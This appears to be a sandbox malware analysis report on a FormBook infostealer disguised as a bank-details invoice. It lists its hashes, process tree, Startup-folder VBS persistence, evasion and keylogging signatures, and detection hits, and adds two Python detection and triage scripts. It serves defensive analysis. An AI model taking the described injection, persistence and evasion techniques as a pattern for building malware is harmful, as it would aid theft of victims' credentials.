Windows Analysis Report
confirm bank details invoice.exe

Overview

General Information

Sample name: confirm bank details invoice.exe
Analysis ID: 1560108
MD5: aac8fccdea2f379bb5c27edf267427fd
SHA1: e193c96e5d20e5f296fc8bf84145bfdbe8ce1cfc
SHA256: 2faacf34e9482cbf4d1b032af7193b4c1ecd419da8377d47e1a307f17b77bc27
Tags: exe, user-TeamDreier

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • confirm bank details invoice.exe (PID: 4332 cmdline: "C:\Users\user\Desktop\confirm bank details invoice.exe" MD5: AAC8FCCDEA2F379BB5C27EDF267427FD)
    • deblaterate.exe (PID: 7112 cmdline: "C:\Users\user\Desktop\confirm bank details invoice.exe" MD5: AAC8FCCDEA2F379BB5C27EDF267427FD)
      • svchost.exe (PID: 4612 cmdline: "C:\Users\user\Desktop\confirm bank details invoice.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • wscript.exe (PID: 4852 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • deblaterate.exe (PID: 1308 cmdline: "C:\Users\user\AppData\Local\Vevina\deblaterate.exe" MD5: AAC8FCCDEA2F379BB5C27EDF267427FD)
      • svchost.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Local\Vevina\deblaterate.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup
No configs have been found
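The process tree above is the detection surface for this sample: a SysWOW64\svchost.exe whose parent is an executable under the user profile rather than services.exe, a script host launched on a .vbs in the Startup folder, and children whose recorded command line names a different executable than their own image (both deblaterate.exe and svchost.exe were started with the dropper's command line). The following is an added example, not Joe Sandbox code and not part of this report, that runs those three checks over Sysmon Event ID 1-style records constructed from the tree. The parent images of PIDs 4332 and 4852 are not given in the report and are left blank, the benign svchost.exe record (PID 900) is invented as a control, and the allow-list of svchost.exe parents is a simplification of the Sigma rule's, not its exact filter.

```python
import ntpath
import re

# Tokeniser for Windows command lines: quoted strings or bare words.
TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')
# Simplified allow-list of legitimate svchost.exe parents (assumption, not the full Sigma filter).
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")
STARTUP_DIR = "\\start menu\\programs\\startup\\"

# Constructed Sysmon EID 1-style records built from the report's process tree.
# ParentImage for PIDs 4332 and 4852 is not in the report and is left empty;
# PID 900 is an invented benign control.
EVENTS = [
    {"ProcessId": 4332, "ParentProcessId": None,
     "Image": r"C:\Users\user\Desktop\confirm bank details invoice.exe",
     "CommandLine": r'"C:\Users\user\Desktop\confirm bank details invoice.exe"',
     "ParentImage": ""},
    {"ProcessId": 7112, "ParentProcessId": 4332,
     "Image": r"C:\Users\user\AppData\Local\Vevina\deblaterate.exe",
     "CommandLine": r'"C:\Users\user\Desktop\confirm bank details invoice.exe"',
     "ParentImage": r"C:\Users\user\Desktop\confirm bank details invoice.exe"},
    {"ProcessId": 4612, "ParentProcessId": 7112,
     "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Users\user\Desktop\confirm bank details invoice.exe"',
     "ParentImage": r"C:\Users\user\AppData\Local\Vevina\deblaterate.exe"},
    {"ProcessId": 4852, "ParentProcessId": 1028,
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs"',
     "ParentImage": ""},
    {"ProcessId": 900, "ParentProcessId": 700,
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


def argv(cmdline):
    """Split a Windows command line into tokens, honouring double quotes."""
    return [quoted or bare for quoted, bare in TOKEN_RE.findall(cmdline)]


def check_event(ev):
    """Return the names of the checks an event trips, in a fixed order."""
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    args = argv(ev["CommandLine"])
    hits = []
    # 1. svchost.exe not started by services.exe (or another expected parent).
    if image == "svchost.exe" and parent not in SVCHOST_PARENTS:
        hits.append("uncommon_svchost_parent")
    # 2. wscript/cscript given a script file, and specifically one in the Startup folder.
    if image in SCRIPT_HOSTS:
        scripts = [a for a in args[1:] if a.lower().endswith(SCRIPT_EXT)]
        if scripts:
            hits.append("script_host_runs_script")
        if any(STARTUP_DIR in a.lower() for a in scripts):
            hits.append("script_from_startup_folder")
    # 3. The program named in the command line is not the image that actually runs.
    if args and ntpath.basename(args[0]).lower() != image:
        hits.append("image_cmdline_mismatch")
    return hits


def scan(events):
    """Map ProcessId -> list of tripped checks, omitting clean processes."""
    results = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            results[ev["ProcessId"]] = hits
    return results


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, hits)
```

The image/command-line mismatch is the cheapest tell here: it needs no API monitoring, only the process-creation record. It is not proof of hollowing on its own, but combined with the svchost.exe parent check it isolates PID 4612 from the benign control without any signature for the dropper.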
Yara matches, memory dumps (Source | Rule | Description | Author):
00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Yara matches, unpacked PE files (Source | Rule | Description | Author):
7.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
7.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
3.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                  System Summary

                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 4852, ProcessName: wscript.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\confirm bank details invoice.exe", CommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", ParentImage: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, ParentProcessId: 7112, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", ProcessId: 4612, ProcessName: svchost.exe
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" , ProcessId: 4852, ProcessName: wscript.exe
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\confirm bank details invoice.exe", CommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", ParentImage: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, ParentProcessId: 7112, ParentProcessName: deblaterate.exe, ProcessCommandLine: "C:\Users\user\Desktop\confirm bank details invoice.exe", ProcessId: 4612, ProcessName: svchost.exe

                  Data Obfuscation

                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, ProcessId: 7112, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs
                  No Suricata rule has matched
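The file-created event above (Sysmon EID 11, deblaterate.exe writing deblaterate.vbs into the per-user Startup folder) together with the process tree gives a host-side triage recipe: list script files in the Startup folder, pull the executable paths they launch, and hash whatever is at those paths against the report's SHA256. The following is an added example, not Joe Sandbox code and not part of this report. It runs offline against a profile directory built in a temporary folder; the VBS body it writes is constructed (the report does not show the script's contents, only that wscript.exe queried the WScript.Shell COM object), and the placeholder deblaterate.exe bytes are not the sample, so the hash lookup deliberately reports no match.

```python
import hashlib
import os
import re
import tempfile

STARTUP_PARTS = ("AppData", "Roaming", "Microsoft", "Windows", "Start Menu", "Programs", "Startup")
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd", ".ps1", ".lnk")
# A Windows path ending in .exe, as it would appear inside a launcher script.
EXE_PATH_RE = re.compile(r'[A-Za-z]:\\[^"\'\r\n]+?\.exe', re.IGNORECASE)
# SHA256 of the submitted sample from this report; the dropped copy shares its MD5, so it matches too.
KNOWN_SHA256 = {
    "2faacf34e9482cbf4d1b032af7193b4c1ecd419da8377d47e1a307f17b77bc27":
        "confirm bank details invoice.exe / deblaterate.exe (this report)",
}


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def profile_path(profile_root, win_path):
    """Map C:\\Users\\<name>\\... onto profile_root (assumed to be that user's profile directory)."""
    parts = win_path.split("\\")
    if len(parts) > 3 and parts[1].lower() == "users":
        return os.path.join(profile_root, *parts[3:])
    return None


def triage(profile_root):
    """Report every script in the Startup folder, the .exe paths it references, and their hashes."""
    findings = []
    startup = os.path.join(profile_root, *STARTUP_PARTS)
    if not os.path.isdir(startup):
        return findings
    for name in sorted(os.listdir(startup)):
        if not name.lower().endswith(SCRIPT_EXT):
            continue
        spath = os.path.join(startup, name)
        finding = {"startup_script": name, "sha256": sha256_file(spath), "launches": []}
        with open(spath, "r", errors="replace") as f:
            body = f.read()
        for target in EXE_PATH_RE.findall(body):
            local = profile_path(profile_root, target)
            entry = {"path": target, "present": bool(local and os.path.isfile(local))}
            if entry["present"]:
                digest = sha256_file(local)
                entry["sha256"] = digest
                entry["known_as"] = KNOWN_SHA256.get(digest)  # None when the hash is unknown
            finding["launches"].append(entry)
        findings.append(finding)
    return findings


def build_demo_profile():
    """Constructed profile tree mirroring the report's drop paths; file contents are placeholders."""
    root = tempfile.mkdtemp(prefix="profile_")
    os.makedirs(os.path.join(root, *STARTUP_PARTS))
    drop_dir = os.path.join(root, "AppData", "Local", "Vevina")
    os.makedirs(drop_dir)
    with open(os.path.join(drop_dir, "deblaterate.exe"), "wb") as f:
        f.write(b"MZ" + b"\0" * 62)  # placeholder bytes, not the sample
    with open(os.path.join(root, *STARTUP_PARTS, "deblaterate.vbs"), "w") as f:
        f.write('Set sh = CreateObject("WScript.Shell")\r\n'
                'sh.Run """C:\\Users\\user\\AppData\\Local\\Vevina\\deblaterate.exe"""\r\n')
    return root


if __name__ == "__main__":
    for finding in triage(build_demo_profile()):
        print(finding)
```

On a live host, point `triage` at each profile under C:\Users; the per-user Startup folder is the one this sample uses, so the all-users folder under ProgramData is out of scope here. Reading the script body is what turns "a .vbs in Startup" into the actual persistence target, which is the file to hash and collect.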

                  AV Detection

                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, ReversingLabs: Detection: 34%
                  Source: confirm bank details invoice.exe, ReversingLabs: Detection: 34%
                  Source: Yara match, file source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, file source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, file source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, file source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, file source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, file source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, file source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, file source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Submitted sample, Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exe, Joe Sandbox ML: detected
                  Source: confirm bank details invoice.exe, Joe Sandbox ML: detected
                  Source: confirm bank details invoice.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: Binary string: wntdll.pdbUGP source: deblaterate.exe, 00000002.00000003.2182122492.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000002.00000003.2181870109.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2296558454.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2294004836.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.000000000379E000.00000040.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2314686450.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2315495745.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2420985063.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2418955435.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: deblaterate.exe, 00000002.00000003.2182122492.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000002.00000003.2181870109.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2296558454.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2294004836.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2352991804.000000000379E000.00000040.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2314686450.00000000037C0000.00000004.00001000.00020000.00000000.sdmp, deblaterate.exe, 00000005.00000003.2315495745.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2420985063.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2418955435.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2463444014.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004B6CA9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_004B60DD
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_004B63F9
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004BEB60
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BF56F FindFirstFileW,FindClose,0_2_004BF56F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004BF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004BF5FA
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C1B2F
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_004C1C8A
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_004C1F94
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D66CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00D66CA9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D660DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00D660DD
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D663F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00D663F9
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D6EB60
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00D6F5FA
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D6F56F FindFirstFileW,FindClose,2_2_00D6F56F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71B2F
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00D71C8A
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D71F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00D71F94
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004C4EB5
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C6B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_004C6B0C
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004C6D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_004C6D07
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D76D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00D76D07
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004B2B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_004B2B37
                  Source: C:\Users\user\Desktop\confirm bank details invoice.exeCode function: 0_2_004DF7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_004DF7FF
                  Source: C:\Users\user\AppData\Local\Vevina\deblaterate.exeCode function: 2_2_00D8F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00D8F7FF

                  E-Banking Fraud

                  Source: Yara match, file source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, file source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, file source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, file source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, file source: 00000007.00000002.2462871861.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, file source: 00000003.00000002.2352206461.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match, file source: 00000007.00000002.2463196003.0000000003160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, file source: 00000003.00000002.2352898550.0000000003390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                  System Summary

                  Source: C:\Users\user\Desktop\confirm bank details invoice.exe, Code function: 0_2_00473D19 references the string "This is a third-party compiled AutoIt script."
                  Source: confirm bank details invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                  Source: confirm bank details invoice.exe, 00000000.00000003.2163668787.0000000003A5D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8198f41a-1
                  Source: confirm bank details invoice.exe, 00000000.00000003.2163668787.0000000003A5D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f49c3fab-2
                  Source: confirm bank details invoice.exe, 00000000.00000000.2140619357.000000000051E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6d469efa-4
